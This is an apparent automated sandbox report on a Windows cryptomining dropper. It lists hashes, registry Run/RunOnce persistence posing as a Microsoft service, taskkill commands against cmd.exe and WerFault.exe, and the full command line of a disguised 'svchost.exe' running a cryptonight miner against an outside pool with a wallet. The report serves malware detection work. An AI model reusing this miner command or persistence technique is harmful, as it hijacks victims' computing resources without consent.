Analysis
-
max time kernel
141s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25-11-2022 23:40
Static task
static1
Behavioral task
behavioral1
Sample
da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe
Resource
win10v2004-20220812-en
General
-
Target
da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe
-
Size
4.8MB
-
MD5
52892e52a02453b4b4c19243aa2d6ac7
-
SHA1
d1ad866e6ca77d3fbe7252db58528240f7c444db
-
SHA256
da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740
-
SHA512
16c15f63c585a459b3e83482e4171fe5b86a8bd6e142636618b7f2240d47fd59813abb44f2bec59735f7711b8b8cc02e14a9eca7d0a4a2f339f158244b24716b
-
SSDEEP
98304:Pcj2HBOSbXcjxJyKFnbU2rsygBuyz0ANbXBdijekvX4jtfKillblA7CjmiU/F7KY:kaEaXWYUnA2rsNLWPX4Bv0CmiU92w
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
ntsmss.exesvchost.exepid process 1800 ntsmss.exe 1588 svchost.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\libcurl.dll vmprotect \Users\Admin\AppData\Local\Temp\libcurl.dll vmprotect behavioral1/memory/1588-87-0x0000000180000000-0x00000001800C2000-memory.dmp vmprotect behavioral1/memory/1588-91-0x0000000180000000-0x00000001800C2000-memory.dmp vmprotect behavioral1/memory/1588-93-0x0000000180000000-0x00000001800C2000-memory.dmp vmprotect -
Deletes itself 1 IoCs
Processes:
ntsmss.exepid process 1800 ntsmss.exe -
Loads dropped DLL 7 IoCs
Processes:
da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exentsmss.exesvchost.exepid process 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe 1800 ntsmss.exe 700 1588 svchost.exe 1588 svchost.exe 1588 svchost.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exentsmss.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows RaiseException Service = "C:\\Users\\Admin\\AppData\\Roaming\\RaiseException\\ntsmss.exe" da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Windows RaiseException Service = "C:\\Users\\Admin\\AppData\\Roaming\\RaiseException\\ntsmss.exe" da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce ntsmss.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Windows RaiseException Service = "C:\\Users\\Admin\\AppData\\Roaming\\RaiseException\\ntsmss.exe" ntsmss.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1472 taskkill.exe 1740 taskkill.exe 952 taskkill.exe 1604 taskkill.exe 1408 taskkill.exe 1468 taskkill.exe 1944 taskkill.exe 1524 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exentsmss.exepid process 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe 1800 ntsmss.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exesvchost.exedescription pid process Token: SeDebugPrivilege 952 taskkill.exe Token: SeDebugPrivilege 1604 taskkill.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeDebugPrivilege 1408 taskkill.exe Token: SeDebugPrivilege 1944 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 1472 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe Token: SeLockMemoryPrivilege 1588 svchost.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exentsmss.exedescription pid process target process PID 1832 wrote to memory of 952 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 952 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 952 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 952 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1604 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1604 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1604 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1604 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1408 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1408 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1408 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1408 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1468 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1468 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1468 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1468 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe taskkill.exe PID 1832 wrote to memory of 1800 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe ntsmss.exe PID 1832 wrote to memory of 1800 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe ntsmss.exe PID 1832 wrote to memory of 1800 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe ntsmss.exe PID 1832 wrote to memory of 1800 1832 da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe ntsmss.exe PID 1800 wrote to memory of 1944 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1944 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1944 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1944 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1524 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1524 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1524 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1524 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1472 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1472 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1472 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1472 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1740 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1740 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1740 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1740 1800 ntsmss.exe taskkill.exe PID 1800 wrote to memory of 1588 1800 ntsmss.exe svchost.exe PID 1800 wrote to memory of 1588 1800 ntsmss.exe svchost.exe PID 1800 wrote to memory of 1588 1800 ntsmss.exe svchost.exe PID 1800 wrote to memory of 1588 1800 ntsmss.exe svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe"C:\Users\Admin\AppData\Local\Temp\da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im CheckServer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:952 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im cmd.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im WerFault.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1408 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im exceptionfilter.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468 -
C:\Users\Admin\AppData\Roaming\RaiseException\ntsmss.exe"C:\Users\Admin\AppData\Roaming\RaiseException\ntsmss.exe" C:\Users\Admin\AppData\Local\Temp\da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740.exe2⤵
- Executes dropped EXE
- Deletes itself
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im CheckServer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im cmd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im WerFault.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im exceptionfilter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe" -a cryptonight -o stratum+tcp://pool.cryptoescrow.eu:3333 -u 46sSETXrZGT8bupxdc2MAbLe3PMV9nJTRTE5uaFErXFz6ymyzVdH86KDb9TNoG4ny5QLELfopynWeBSMoT1M2Ga8RBkDqTH -p x -t 23⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1588
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
809KB
MD5366fd6f3a451351b5df2d7c4ecf4c73a
SHA150db750522b9630757f91b53df377fd4ed4e2d66
SHA256ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5
SHA5122de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130
-
Filesize
341KB
MD5d1c5379a98047acadaf97b35dcb239e3
SHA19b60fcab990cbbb237b15e6a52e29ffabca13760
SHA25690100f13e683e8ea8196a938a9f1aad8888211a395afaba6bb55359767e00f26
SHA512acd489256514510ff23500d9340533d4dac3e362d8f38ebf9e46fffb051b75bfd844e325ffd39b980114f718e09b3cdf01716600e14d9263ad139e0119bec841
-
Filesize
81KB
MD54a502706d149c2f5854131a7758a90e2
SHA1845842f909769a673138553748ad09e609ec3e17
SHA2560e6af724609ef6846982ef717013426c359c455fff324e906d8d55c8bb88d16e
SHA5121cdc7d92dfee299850fe8703509e3cf33470470d239b27ca9d5760d3fd01775c3512b80e4b9bdca9f782c2193be0c0a554c1bb37c1a99e435e96e14902386161
-
Filesize
210KB
MD5f269f2f43288c764d42ad78a6f2b09cb
SHA1aefafdcb035f361e8786ce4e10e122684c674cbe
SHA2563017c9c2d33d932e7180103cf86996d0df6de73c86eebd3f6425be188d8bcb93
SHA512278f11d99ef8f393155151031273550de66526220f790646c343a7ce0114f37a4758d575e17ffeab74a5ccb77a8f139577ee0513478704f6422a0543b73a4b5d
-
Filesize
4.8MB
MD552892e52a02453b4b4c19243aa2d6ac7
SHA1d1ad866e6ca77d3fbe7252db58528240f7c444db
SHA256da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740
SHA51216c15f63c585a459b3e83482e4171fe5b86a8bd6e142636618b7f2240d47fd59813abb44f2bec59735f7711b8b8cc02e14a9eca7d0a4a2f339f158244b24716b
-
Filesize
4.8MB
MD552892e52a02453b4b4c19243aa2d6ac7
SHA1d1ad866e6ca77d3fbe7252db58528240f7c444db
SHA256da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740
SHA51216c15f63c585a459b3e83482e4171fe5b86a8bd6e142636618b7f2240d47fd59813abb44f2bec59735f7711b8b8cc02e14a9eca7d0a4a2f339f158244b24716b
-
Filesize
341KB
MD5d1c5379a98047acadaf97b35dcb239e3
SHA19b60fcab990cbbb237b15e6a52e29ffabca13760
SHA25690100f13e683e8ea8196a938a9f1aad8888211a395afaba6bb55359767e00f26
SHA512acd489256514510ff23500d9340533d4dac3e362d8f38ebf9e46fffb051b75bfd844e325ffd39b980114f718e09b3cdf01716600e14d9263ad139e0119bec841
-
Filesize
809KB
MD5366fd6f3a451351b5df2d7c4ecf4c73a
SHA150db750522b9630757f91b53df377fd4ed4e2d66
SHA256ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5
SHA5122de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130
-
Filesize
81KB
MD54a502706d149c2f5854131a7758a90e2
SHA1845842f909769a673138553748ad09e609ec3e17
SHA2560e6af724609ef6846982ef717013426c359c455fff324e906d8d55c8bb88d16e
SHA5121cdc7d92dfee299850fe8703509e3cf33470470d239b27ca9d5760d3fd01775c3512b80e4b9bdca9f782c2193be0c0a554c1bb37c1a99e435e96e14902386161
-
Filesize
210KB
MD5f269f2f43288c764d42ad78a6f2b09cb
SHA1aefafdcb035f361e8786ce4e10e122684c674cbe
SHA2563017c9c2d33d932e7180103cf86996d0df6de73c86eebd3f6425be188d8bcb93
SHA512278f11d99ef8f393155151031273550de66526220f790646c343a7ce0114f37a4758d575e17ffeab74a5ccb77a8f139577ee0513478704f6422a0543b73a4b5d
-
Filesize
210KB
MD5f269f2f43288c764d42ad78a6f2b09cb
SHA1aefafdcb035f361e8786ce4e10e122684c674cbe
SHA2563017c9c2d33d932e7180103cf86996d0df6de73c86eebd3f6425be188d8bcb93
SHA512278f11d99ef8f393155151031273550de66526220f790646c343a7ce0114f37a4758d575e17ffeab74a5ccb77a8f139577ee0513478704f6422a0543b73a4b5d
-
Filesize
4.8MB
MD552892e52a02453b4b4c19243aa2d6ac7
SHA1d1ad866e6ca77d3fbe7252db58528240f7c444db
SHA256da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740
SHA51216c15f63c585a459b3e83482e4171fe5b86a8bd6e142636618b7f2240d47fd59813abb44f2bec59735f7711b8b8cc02e14a9eca7d0a4a2f339f158244b24716b
-
Filesize
4.8MB
MD552892e52a02453b4b4c19243aa2d6ac7
SHA1d1ad866e6ca77d3fbe7252db58528240f7c444db
SHA256da90aebcc0d981ed6c0f5a0c031751b0858f7b4accd571ac2acdfc7b496d9740
SHA51216c15f63c585a459b3e83482e4171fe5b86a8bd6e142636618b7f2240d47fd59813abb44f2bec59735f7711b8b8cc02e14a9eca7d0a4a2f339f158244b24716b